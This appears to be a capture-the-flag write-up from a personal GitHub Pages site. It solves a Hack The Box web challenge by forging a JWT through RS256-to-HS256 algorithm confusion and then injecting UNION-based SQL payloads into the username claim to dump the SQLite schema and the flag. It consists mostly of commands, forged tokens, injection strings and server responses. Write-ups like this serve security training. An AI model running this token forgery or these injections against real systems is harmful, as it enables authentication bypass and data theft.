0xc0rvu5.github.io

View on GitHub

Under Construction

JWT

SQLi

Refer to for additional information:

JWT Attacks

JWT authentication bypass via algorithm confusion with no exposed key

Go to:

http://104.248.172.48:32311/

Register a user with any arbitrary uname/pword

hey:hey

Ensure burpsuite is active
Go to: Extender -> BApp Store -> Search (JWT Editor) -> Install
Login as:

hey:hey

Go to: HTTP history
Copy the JWT cookie
Logout
Login as:

hey:hey

Go to: HTTP history
Copy the second JWT cookie

Use the Portswigger gurus docker setup:
Syntax:

docker run --rm -it portswigger/sig2n cookie1 cookie2

Cookie 1

eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImhleSIsInBrIjoiLS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS1cbk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBOTVvVG05RE56Y0hyOGdMaGpaYVlcbmt0c2JqMUt4eFVPb3p3MHRyUDkzQmdJcFh2NldpcFFSQjVscW9mUGxVNkZCOTlKYzVRWjA0NTl0NzNnZ1ZEUWlcblh1Q01JMmhvVWZKMVZtak5lV0NyU3JEVWhva0lGWkV1Q3VtZWh3d3RVTnVFdjBlekM1NFpUZEVDNVlTVEFPemdcbmpJV2Fsc0hqL2dhNVpFRHgzRXh0ME1oNUFFd2JBRDczK3FYUy91Q3ZoZmFqZ3B6SEdkOU9nTlFVNjBMTWYybUhcbitGeW5Oc2pOTndvNW5SZTd0UjEyV2IyWU9DeHcydmRhbU8xbjFrZi9TTXlwU0tLdk9najV5MExHaVUzamVYTXhcblY4V1MrWWlZQ1U1T0JBbVRjejJ3Mmt6QmhaRmxINlJLNG1xdWV4SkhyYTIzSUd2NVVKNUdWUEVYcGRDcUszVHJcbjB3SURBUUFCXG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS1cbiIsImlhdCI6MTY1NjEyMDQ0M30.VPHUdzHzxRFewKuYtVb4k3_y7tmH5qzAyyZyZjgw4Fu2hJgF-VSQevcMFDeXMsKozr0jbQjhHPtTwxuyToGqWbIbgcShL241c1JKOWBViBqaKtd0wD9rw_MuUufBK1LXQz-LyRoHrspFrdxQIZf2vzH0_ZE45fMPhEtpYGyHSbKdk6jVfWoOFmgMn5mj195nXTDYebCdjo-KXEJpiY-KT4RxNweR8OHVmVZAuVP3U0tWuOquhITyKD_6r8V-PXkCwLTTazOyfTbafAOMTq_DxdDsA51EKW5_ZzLiW_0u9nM_o-5oQu7dHVxOl8JSwxikf701GIOlwojkx2OV2QeVIg

Cookie 2

eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImhleSIsInBrIjoiLS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS1cbk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBOTVvVG05RE56Y0hyOGdMaGpaYVlcbmt0c2JqMUt4eFVPb3p3MHRyUDkzQmdJcFh2NldpcFFSQjVscW9mUGxVNkZCOTlKYzVRWjA0NTl0NzNnZ1ZEUWlcblh1Q01JMmhvVWZKMVZtak5lV0NyU3JEVWhva0lGWkV1Q3VtZWh3d3RVTnVFdjBlekM1NFpUZEVDNVlTVEFPemdcbmpJV2Fsc0hqL2dhNVpFRHgzRXh0ME1oNUFFd2JBRDczK3FYUy91Q3ZoZmFqZ3B6SEdkOU9nTlFVNjBMTWYybUhcbitGeW5Oc2pOTndvNW5SZTd0UjEyV2IyWU9DeHcydmRhbU8xbjFrZi9TTXlwU0tLdk9najV5MExHaVUzamVYTXhcblY4V1MrWWlZQ1U1T0JBbVRjejJ3Mmt6QmhaRmxINlJLNG1xdWV4SkhyYTIzSUd2NVVKNUdWUEVYcGRDcUszVHJcbjB3SURBUUFCXG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS1cbiIsImlhdCI6MTY1NjEyMDgwMX0.XTuCoLLfHPn9oD-hUaX5RtVuMNgEXmns_TBgjfGM7K6nYJIsjB5pcwxdrxzOYXGn0273HZVAGNkxHxy0V9ZmKAYagub_vX2BMS_pa4Ozcvpc8RiR_PpooDDGzHyoect8Ly3eDAaVu0yTFjK6_UAWvaRvsqbuK8IKWp4diif5bUAbEq0NdMfSS6_g8AumIbT3bL3Q1TWVxau4Fv-_kAPumILK1tDHeghz2EcKKekoqZiYSsvkGDx6Uvjkdjg7ElORjt3byrm0xL383V92ClGS05j8JcU2JM9jZDvqjDD14oZILFcxbkyqv0EBb275pbakpB8QyWxp1g5b_FOVS1IOnw

Like so:

docker run --rm -it portswigger/sig2n eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImhleSIsInBrIjoiLS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS1cbk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBOTVvVG05RE56Y0hyOGdMaGpaYVlcbmt0c2JqMUt4eFVPb3p3MHRyUDkzQmdJcFh2NldpcFFSQjVscW9mUGxVNkZCOTlKYzVRWjA0NTl0NzNnZ1ZEUWlcblh1Q01JMmhvVWZKMVZtak5lV0NyU3JEVWhva0lGWkV1Q3VtZWh3d3RVTnVFdjBlekM1NFpUZEVDNVlTVEFPemdcbmpJV2Fsc0hqL2dhNVpFRHgzRXh0ME1oNUFFd2JBRDczK3FYUy91Q3ZoZmFqZ3B6SEdkOU9nTlFVNjBMTWYybUhcbitGeW5Oc2pOTndvNW5SZTd0UjEyV2IyWU9DeHcydmRhbU8xbjFrZi9TTXlwU0tLdk9najV5MExHaVUzamVYTXhcblY4V1MrWWlZQ1U1T0JBbVRjejJ3Mmt6QmhaRmxINlJLNG1xdWV4SkhyYTIzSUd2NVVKNUdWUEVYcGRDcUszVHJcbjB3SURBUUFCXG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS1cbiIsImlhdCI6MTY1NjEyMDQ0M30.VPHUdzHzxRFewKuYtVb4k3_y7tmH5qzAyyZyZjgw4Fu2hJgF-VSQevcMFDeXMsKozr0jbQjhHPtTwxuyToGqWbIbgcShL241c1JKOWBViBqaKtd0wD9rw_MuUufBK1LXQz-LyRoHrspFrdxQIZf2vzH0_ZE45fMPhEtpYGyHSbKdk6jVfWoOFmgMn5mj195nXTDYebCdjo-KXEJpiY-KT4RxNweR8OHVmVZAuVP3U0tWuOquhITyKD_6r8V-PXkCwLTTazOyfTbafAOMTq_DxdDsA51EKW5_ZzLiW_0u9nM_o-5oQu7dHVxOl8JSwxikf701GIOlwojkx2OV2QeVIg eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImhleSIsInBrIjoiLS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS1cbk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBOTVvVG05RE56Y0hyOGdMaGpaYVlcbmt0c2JqMUt4eFVPb3p3MHRyUDkzQmdJcFh2NldpcFFSQjVscW9mUGxVNkZCOTlKYzVRWjA0NTl0NzNnZ1ZEUWlcblh1Q01JMmhvVWZKMVZtak5lV0NyU3JEVWhva0lGWkV1Q3VtZWh3d3RVTnVFdjBlekM1NFpUZEVDNVlTVEFPemdcbmpJV2Fsc0hqL2dhNVpFRHgzRXh0ME1oNUFFd2JBRDczK3FYUy91Q3ZoZmFqZ3B6SEdkOU9nTlFVNjBMTWYybUhcbitGeW5Oc2pOTndvNW5SZTd0UjEyV2IyWU9DeHcydmRhbU8xbjFrZi9TTXlwU0tLdk9najV5MExHaVUzamVYTXhcblY4V1MrWWlZQ1U1T0JBbVRjejJ3Mmt6QmhaRmxINlJLNG1xdWV4SkhyYTIzSUd2NVVKNUdWUEVYcGRDcUszVHJcbjB3SURBUUFCXG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS1cbiIsImlhdCI6MTY1NjEyMDgwMX0.XTuCoLLfHPn9oD-hUaX5RtVuMNgEXmns_TBgjfGM7K6nYJIsjB5pcwxdrxzOYXGn0273HZVAGNkxHxy0V9ZmKAYagub_vX2BMS_pa4Ozcvpc8RiR_PpooDDGzHyoect8Ly3eDAaVu0yTFjK6_UAWvaRvsqbuK8IKWp4diif5bUAbEq0NdMfSS6_g8AumIbT3bL3Q1TWVxau4Fv-_kAPumILK1tDHeghz2EcKKekoqZiYSsvkGDx6Uvjkdjg7ElORjt3byrm0xL383V92ClGS05j8JcU2JM9jZDvqjDD14oZILFcxbkyqv0EBb275pbakpB8QyWxp1g5b_FOVS1IOnw

Response:

Found n with multiplier 1:
    Base64 encoded x509 key: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUE5NW9UbTlETnpjSHI4Z0xoalphWQprdHNiajFLeHhVT296dzB0clA5M0JnSXBYdjZXaXBRUkI1bHFvZlBsVTZGQjk5SmM1UVowNDU5dDczZ2dWRFFpClh1Q01JMmhvVWZKMVZtak5lV0NyU3JEVWhva0lGWkV1Q3VtZWh3d3RVTnVFdjBlekM1NFpUZEVDNVlTVEFPemcKaklXYWxzSGovZ2E1WkVEeDNFeHQwTWg1QUV3YkFENzMrcVhTL3VDdmhmYWpncHpIR2Q5T2dOUVU2MExNZjJtSAorRnluTnNqTk53bzVuUmU3dFIxMldiMllPQ3h3MnZkYW1PMW4xa2YvU015cFNLS3ZPZ2o1eTBMR2lVM2plWE14ClY4V1MrWWlZQ1U1T0JBbVRjejJ3Mmt6QmhaRmxINlJLNG1xdWV4SkhyYTIzSUd2NVVKNUdWUEVYcGRDcUszVHIKMHdJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==
    Tampered JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICJoZXkiLCAicGsiOiAiLS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS1cbk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBOTVvVG05RE56Y0hyOGdMaGpaYVlcbmt0c2JqMUt4eFVPb3p3MHRyUDkzQmdJcFh2NldpcFFSQjVscW9mUGxVNkZCOTlKYzVRWjA0NTl0NzNnZ1ZEUWlcblh1Q01JMmhvVWZKMVZtak5lV0NyU3JEVWhva0lGWkV1Q3VtZWh3d3RVTnVFdjBlekM1NFpUZEVDNVlTVEFPemdcbmpJV2Fsc0hqL2dhNVpFRHgzRXh0ME1oNUFFd2JBRDczK3FYUy91Q3ZoZmFqZ3B6SEdkOU9nTlFVNjBMTWYybUhcbitGeW5Oc2pOTndvNW5SZTd0UjEyV2IyWU9DeHcydmRhbU8xbjFrZi9TTXlwU0tLdk9najV5MExHaVUzamVYTXhcblY4V1MrWWlZQ1U1T0JBbVRjejJ3Mmt6QmhaRmxINlJLNG1xdWV4SkhyYTIzSUd2NVVKNUdWUEVYcGRDcUszVHJcbjB3SURBUUFCXG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS1cbiIsICJpYXQiOiAxNjU2MTIwNDQzLCAiZXhwIjogMTY1NjIwNzM4N30.233s7n_rYQWWHIRLzlw56_yxlofoaXE7-aM31TIP1TE
    Base64 encoded pkcs1 key: LS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JSUJDZ0tDQVFFQTk1b1RtOUROemNIcjhnTGhqWmFZa3RzYmoxS3h4VU9vencwdHJQOTNCZ0lwWHY2V2lwUVIKQjVscW9mUGxVNkZCOTlKYzVRWjA0NTl0NzNnZ1ZEUWlYdUNNSTJob1VmSjFWbWpOZVdDclNyRFVob2tJRlpFdQpDdW1laHd3dFVOdUV2MGV6QzU0WlRkRUM1WVNUQU96Z2pJV2Fsc0hqL2dhNVpFRHgzRXh0ME1oNUFFd2JBRDczCitxWFMvdUN2aGZhamdwekhHZDlPZ05RVTYwTE1mMm1IK0Z5bk5zak5Od281blJlN3RSMTJXYjJZT0N4dzJ2ZGEKbU8xbjFrZi9TTXlwU0tLdk9najV5MExHaVUzamVYTXhWOFdTK1lpWUNVNU9CQW1UY3oydzJrekJoWkZsSDZSSwo0bXF1ZXhKSHJhMjNJR3Y1VUo1R1ZQRVhwZENxSzNUcjB3SURBUUFCCi0tLS0tRU5EIFJTQSBQVUJMSUMgS0VZLS0tLS0K
    Tampered JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICJoZXkiLCAicGsiOiAiLS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS1cbk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBOTVvVG05RE56Y0hyOGdMaGpaYVlcbmt0c2JqMUt4eFVPb3p3MHRyUDkzQmdJcFh2NldpcFFSQjVscW9mUGxVNkZCOTlKYzVRWjA0NTl0NzNnZ1ZEUWlcblh1Q01JMmhvVWZKMVZtak5lV0NyU3JEVWhva0lGWkV1Q3VtZWh3d3RVTnVFdjBlekM1NFpUZEVDNVlTVEFPemdcbmpJV2Fsc0hqL2dhNVpFRHgzRXh0ME1oNUFFd2JBRDczK3FYUy91Q3ZoZmFqZ3B6SEdkOU9nTlFVNjBMTWYybUhcbitGeW5Oc2pOTndvNW5SZTd0UjEyV2IyWU9DeHcydmRhbU8xbjFrZi9TTXlwU0tLdk9najV5MExHaVUzamVYTXhcblY4V1MrWWlZQ1U1T0JBbVRjejJ3Mmt6QmhaRmxINlJLNG1xdWV4SkhyYTIzSUd2NVVKNUdWUEVYcGRDcUszVHJcbjB3SURBUUFCXG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS1cbiIsICJpYXQiOiAxNjU2MTIwNDQzLCAiZXhwIjogMTY1NjIwNzM4N30.1JATbSWXpBUGZ6QYAP5uuNfGsYUTS7PU9YuXU7zce7U

Go to: Repeater -> Request -> Raw
Change:

Cookie: session=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImhleSIsInBrIjoiLS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS1cbk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBOTVvVG05RE56Y0hyOGdMaGpaYVlcbmt0c2JqMUt4eFVPb3p3MHRyUDkzQmdJcFh2NldpcFFSQjVscW9mUGxVNkZCOTlKYzVRWjA0NTl0NzNnZ1ZEUWlcblh1Q01JMmhvVWZKMVZtak5lV0NyU3JEVWhva0lGWkV1Q3VtZWh3d3RVTnVFdjBlekM1NFpUZEVDNVlTVEFPemdcbmpJV2Fsc0hqL2dhNVpFRHgzRXh0ME1oNUFFd2JBRDczK3FYUy91Q3ZoZmFqZ3B6SEdkOU9nTlFVNjBMTWYybUhcbitGeW5Oc2pOTndvNW5SZTd0UjEyV2IyWU9DeHcydmRhbU8xbjFrZi9TTXlwU0tLdk9najV5MExHaVUzamVYTXhcblY4V1MrWWlZQ1U1T0JBbVRjejJ3Mmt6QmhaRmxINlJLNG1xdWV4SkhyYTIzSUd2NVVKNUdWUEVYcGRDcUszVHJcbjB3SURBUUFCXG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS1cbiIsImlhdCI6MTY1NjEyMDQ0M30.VPHUdzHzxRFewKuYtVb4k3_y7tmH5qzAyyZyZjgw4Fu2hJgF-VSQevcMFDeXMsKozr0jbQjhHPtTwxuyToGqWbIbgcShL241c1JKOWBViBqaKtd0wD9rw_MuUufBK1LXQz-LyRoHrspFrdxQIZf2vzH0_ZE45fMPhEtpYGyHSbKdk6jVfWoOFmgMn5mj195nXTDYebCdjo-KXEJpiY-KT4RxNweR8OHVmVZAuVP3U0tWuOquhITyKD_6r8V-PXkCwLTTazOyfTbafAOMTq_DxdDsA51EKW5_ZzLiW_0u9nM_o-5oQu7dHVxOl8JSwxikf701GIOlwojkx2OV2QeVIg

To

Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICJoZXkiLCAicGsiOiAiLS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS1cbk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBOTVvVG05RE56Y0hyOGdMaGpaYVlcbmt0c2JqMUt4eFVPb3p3MHRyUDkzQmdJcFh2NldpcFFSQjVscW9mUGxVNkZCOTlKYzVRWjA0NTl0NzNnZ1ZEUWlcblh1Q01JMmhvVWZKMVZtak5lV0NyU3JEVWhva0lGWkV1Q3VtZWh3d3RVTnVFdjBlekM1NFpUZEVDNVlTVEFPemdcbmpJV2Fsc0hqL2dhNVpFRHgzRXh0ME1oNUFFd2JBRDczK3FYUy91Q3ZoZmFqZ3B6SEdkOU9nTlFVNjBMTWYybUhcbitGeW5Oc2pOTndvNW5SZTd0UjEyV2IyWU9DeHcydmRhbU8xbjFrZi9TTXlwU0tLdk9najV5MExHaVUzamVYTXhcblY4V1MrWWlZQ1U1T0JBbVRjejJ3Mmt6QmhaRmxINlJLNG1xdWV4SkhyYTIzSUd2NVVKNUdWUEVYcGRDcUszVHJcbjB3SURBUUFCXG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS1cbiIsICJpYXQiOiAxNjU2MTIwNDQzLCAiZXhwIjogMTY1NjIwNzM4N30.233s7n_rYQWWHIRLzlw56_yxlofoaXE7-aM31TIP1TE

Response:

HTTP/1.1 200 OK

Go to: Repeater -> JSON Web Token -> Payload
Change:

{"username": "hey",

To

{"username": "administrator",

Which changes the cookie to:

Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICJhZG1pbmlzdHJhdG9yIiwgInBrIjogIi0tLS0tQkVHSU4gUFVCTElDIEtFWS0tLS0tXG5NSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTk1b1RtOUROemNIcjhnTGhqWmFZXG5rdHNiajFLeHhVT296dzB0clA5M0JnSXBYdjZXaXBRUkI1bHFvZlBsVTZGQjk5SmM1UVowNDU5dDczZ2dWRFFpXG5YdUNNSTJob1VmSjFWbWpOZVdDclNyRFVob2tJRlpFdUN1bWVod3d0VU51RXYwZXpDNTRaVGRFQzVZU1RBT3pnXG5qSVdhbHNIai9nYTVaRUR4M0V4dDBNaDVBRXdiQUQ3MytxWFMvdUN2aGZhamdwekhHZDlPZ05RVTYwTE1mMm1IXG4rRnluTnNqTk53bzVuUmU3dFIxMldiMllPQ3h3MnZkYW1PMW4xa2YvU015cFNLS3ZPZ2o1eTBMR2lVM2plWE14XG5WOFdTK1lpWUNVNU9CQW1UY3oydzJrekJoWkZsSDZSSzRtcXVleEpIcmEyM0lHdjVVSjVHVlBFWHBkQ3FLM1RyXG4wd0lEQVFBQlxuLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tXG4iLCAiaWF0IjogMTY1NjEyMDQ0MywgImV4cCI6IDE2NTYyMDczODd9.-YBnt3sP1iCGcA1pxTGso9fdRIVZW8lgBYUfpzt56ho

Send
Response:

HTTP/1.1 200 OK

user administrator doesnt exist in our database.

Copy the corresponding base64 encoded x509 key:

LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUE5NW9UbTlETnpjSHI4Z0xoalphWQprdHNiajFLeHhVT296dzB0clA5M0JnSXBYdjZXaXBRUkI1bHFvZlBsVTZGQjk5SmM1UVowNDU5dDczZ2dWRFFpClh1Q01JMmhvVWZKMVZtak5lV0NyU3JEVWhva0lGWkV1Q3VtZWh3d3RVTnVFdjBlekM1NFpUZEVDNVlTVEFPemcKaklXYWxzSGovZ2E1WkVEeDNFeHQwTWg1QUV3YkFENzMrcVhTL3VDdmhmYWpncHpIR2Q5T2dOUVU2MExNZjJtSAorRnluTnNqTk53bzVuUmU3dFIxMldiMllPQ3h3MnZkYW1PMW4xa2YvU015cFNLS3ZPZ2o1eTBMR2lVM2plWE14ClY4V1MrWWlZQ1U1T0JBbVRjejJ3Mmt6QmhaRmxINlJLNG1xdWV4SkhyYTIzSUd2NVVKNUdWUEVYcGRDcUszVHIKMHdJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==

Go to: JWT Editor Keys -> New Symmetric Key -> Generate -> Key
Change:

"k": "vQL86pVOfY7Nln7LYXtbAw"

To

"k": "LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUE5NW9UbTlETnpjSHI4Z0xoalphWQprdHNiajFLeHhVT296dzB0clA5M0JnSXBYdjZXaXBRUkI1bHFvZlBsVTZGQjk5SmM1UVowNDU5dDczZ2dWRFFpClh1Q01JMmhvVWZKMVZtak5lV0NyU3JEVWhva0lGWkV1Q3VtZWh3d3RVTnVFdjBlekM1NFpUZEVDNVlTVEFPemcKaklXYWxzSGovZ2E1WkVEeDNFeHQwTWg1QUV3YkFENzMrcVhTL3VDdmhmYWpncHpIR2Q5T2dOUVU2MExNZjJtSAorRnluTnNqTk53bzVuUmU3dFIxMldiMllPQ3h3MnZkYW1PMW4xa2YvU015cFNLS3ZPZ2o1eTBMR2lVM2plWE14ClY4V1MrWWlZQ1U1T0JBbVRjejJ3Mmt6QmhaRmxINlJLNG1xdWV4SkhyYTIzSUd2NVVKNUdWUEVYcGRDcUszVHIKMHdJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg=="

-> OK
Go to: Repeater -> Request -> JSON Web Token -> Payload
Change:

{"username": "administrator",

To

{"username": "' UNION SELECT NULL,NULL-- a",

Go to: Repeater -> Request -> JSON Web Token -> Sign -> Signing key (newly created key) (dont modify header) -> OK
Response:

HTTP/1.1 500 Internal Server Error

Error: SQLITE_ERROR: SELECTs to the left and right of UNION do not have the same number of result columns

Change:

{"username": "' UNION SELECT NULL,NULL-- a",

To

{"username": "' UNION SELECT NULL,NULL,NULL-- a",

Go to: Repeater -> Request -> JSON Web Token -> Sign -> Signing key (newly created key) (dont modify header) -> OK
Send
Response:

HTTP/1.1 200 OK

Change:

{"username": "' UNION SELECT NULL,NULL,NULL-- a",

To

{"username": "' UNION SELECT name,NULL,NULL FROM sqlite_master where type='table' limit 1 offset 0-- a",

Go to: Repeater -> Request -> JSON Web Token -> Sign -> Signing key (newly created key) (dont modify header) -> OK
Send
Response:

Welcome <br>

Change:

{"username": "' UNION SELECT name,NULL,NULL FROM sqlite_master where type='table' limit 1 offset 0-- a",

To

{"username": "' UNION SELECT NULL,name,NULL FROM sqlite_master where type='table' limit 1 offset 0-- a",

Go to: Repeater -> Request -> JSON Web Token -> Sign -> Signing key (newly created key) (dont modify header) -> OK
Send
Response:

Welcome flag_storage<br>

Change:

{"username": "' UNION SELECT NULL,name,NULL FROM sqlite_master where type='table' limit 1 offset 0-- a",

To

{"username": "' UNION SELECT NULL,sql,NULL FROM sqlite_master where tbl_name = 'flag_storage' and type='table' limit 1 offset 0-- a",

Go to: Repeater -> Request -> JSON Web Token -> Sign -> Signing key (newly created key) (dont modify header) -> OK
Send
Response:

Welcome CREATE TABLE &quot;flag_storage&quot; (
&quot;id&quot;	INTEGER PRIMARY KEY AUTOINCREMENT,
&quot;top_secret_flaag&quot;	TEXT
)<br>

Change:

{"username": "' UNION SELECT NULL,sql,NULL FROM sqlite_master where tbl_name = 'flag_storage' and type='table' limit 1 offset 0-- a",

To

{"username": "' UNION SELECT NULL,top_secret_flaag,NULL FROM flag_storage limit 1 offset 0-- a",

Go to: Repeater -> Request -> JSON Web Token -> Sign -> Signing key (newly created key) (dont modify header) -> OK
Send
Response:

Welcome HTB{flag}<br>

image

image

image

image

image

image

image

image

image

image

#hacking